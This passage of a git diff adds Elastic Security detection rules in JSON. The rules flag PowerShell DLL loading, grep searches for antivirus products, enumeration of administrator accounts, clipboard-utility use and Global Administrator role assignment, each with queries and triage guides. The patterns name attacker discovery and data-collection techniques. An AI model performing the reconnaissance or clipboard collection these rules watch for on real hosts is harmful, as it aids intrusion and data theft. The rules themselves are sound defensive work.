and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:library and \n dll.name:(\"System.Management.Automation.dll\" or \"System.Management.Automation.ni.dll\") and \n not (\n process.code_signature.subject_name:(\"Microsoft Corporation\" or \"Microsoft Dynamic Code Publisher\" or \"Microsoft Windows\") and process.code_signature.trusted:true and not process.name.caseless:(\"regsvr32.exe\" or \"rundll32.exe\")\n ) and \n not (\n process.executable.caseless:(C\\:\\\\Program*Files*\\(x86\\)\\\\*.exe or C\\:\\\\Program*Files\\\\*.exe) and\n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: C\\:\\\\Windows\\\\Lenovo\\\\*.exe and process.code_signature.subject_name:\"Lenovo\" and \n process.code_signature.trusted:true\n ) and \n not (\n process.executable.caseless: \"C:\\\\ProgramData\\\\chocolatey\\\\choco.exe\" and\n process.code_signature.subject_name:\"Chocolatey Software, Inc.\" and process.code_signature.trusted:true\n ) and not process.executable.caseless : \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": false, + "name": 
"process.executable.caseless", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 210 + }, + "id": "852c1f19-68e8-43a6-9dce-340771fe1be3_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json new file mode 100644 index 00000000000..e88acd4d55a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_109.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the grep command to discover known third-party macOS and Linux security tools, such as Antivirus or Host Firewall details.", + "false_positives": [ + "Endpoint Security installers, updaters and post installation verification scripts." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "auditbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Security Software Discovery via Grep", + "note": "## Triage and analysis\n\n### Investigating Security Software Discovery via Grep\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `grep` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type == \"start\" and\nprocess.name : \"grep\" and user.id != \"0\" and\n not process.parent.executable : (\"/Library/Application Support/*\", \"/opt/McAfee/agent/scripts/ma\") and\n process.args :\n (\"Little Snitch*\",\n \"Avast*\",\n \"Avira*\",\n \"ESET*\",\n \"BlockBlock*\",\n \"360Sec*\",\n \"LuLu*\",\n \"KnockKnock*\",\n \"kav\",\n \"KIS\",\n \"RTProtectionDaemon*\",\n \"Malware*\",\n \"VShieldScanner*\",\n \"WebProtection*\",\n \"webinspectord*\",\n \"McAfee*\",\n \"isecespd*\",\n \"macmnsvc*\",\n \"masvc*\",\n \"kesl*\",\n \"avscan*\",\n \"guard*\",\n \"rtvscand*\",\n \"symcfgd*\",\n \"scmdaemon*\",\n \"symantec*\",\n \"sophos*\",\n \"osquery*\",\n \"elastic-endpoint*\"\n ) and\n not (\n (process.args : \"Avast\" and process.args : \"Passwords\") or\n (process.parent.args : \"/opt/McAfee/agent/scripts/ma\" and process.parent.args : \"checkhealth\") or\n (process.command_line : (\n \"grep ESET Command-line scanner, version %s -A2\",\n \"grep -i McAfee Web Gateway Core version:\",\n \"grep --color=auto ESET Command-line scanner, version %s -A2\"\n )\n ) or\n (process.parent.command_line : (\n \"\"\"sh -c printf \"command_start_%s\"*; perl -pe 's/[^ -~]/\\n/g' < /opt/eset/esets/sbin/esets_scan | grep 'ESET Command-line scanner, version %s' -A2 | tail -1; printf \"command_done_%s*\"\"\",\n \"\"\"bash -c perl -pe 's/[^ -~]/\\n/g' < /opt/eset/esets/sbin/esets_scan | grep 'ESET Command-line scanner, version %s' -A2 | tail -1\"\"\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + 
"ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "870aecc0-cea4-4110-af3f-e02e9b373655_109", + 
"type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json new file mode 100644 index 00000000000..b1e68be9f3b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_111.json 
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Administrator Accounts", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups in the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n (process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and not process.parent.name : \"net.exe\")\n ) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"*admin*\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\")\n and not process.args : (\"/add\", \"/delete\")\n ) or\n (\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\")\n )\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": 
"system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "871ea072-1b71-4def-b016-6278b505138d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": 
"Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "871ea072-1b71-4def-b016-6278b505138d_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json new file mode 100644 index 00000000000..aedb3acbcf8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_112.json 
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumeration of Administrator Accounts", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups in the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (\n (process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and not process.parent.name : \"net.exe\")\n ) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"*admin*\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\")\n and not process.args : (\"/add\", \"/delete\")\n ) or\n (\n (process.name : \"wmic.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\")\n )\n) and not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": 
"system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "871ea072-1b71-4def-b016-6278b505138d", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + }, + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": 
"Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "871ea072-1b71-4def-b016-6278b505138d_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json new file mode 100644 index 00000000000..3b577fac73d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_4.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "from": "now-119m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Suspicious Clipboard Activity Detected", + "new_terms_fields": [ + "host.id", + "process.group_leader.executable" + ], + "query": "event.category:process and host.os.type:\"linux\" and\nevent.type:\"start\" and event.action:(\"exec\" or \"exec_event\" or \"executed\" or \"process_started\") and\nprocess.name:(\"xclip\" or \"xsel\" or \"wl-clipboard\" or \"clipman\" or \"copyq\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Collection", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": 
"https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "884e87cc-c67b-4c90-a4ed-e1e24a940c82_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json new file mode 100644 index 00000000000..cec0b69667c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_103.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json new file mode 100644 index 00000000000..abcba6f1078 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_105.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "88671231-6626-4e1b-abb7-6e361a171fbb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json new file mode 100644 index 00000000000..ef78b06e611 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_206.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Global Administrator Role Assigned", + "note": "", + "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", + "references": [ + "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": 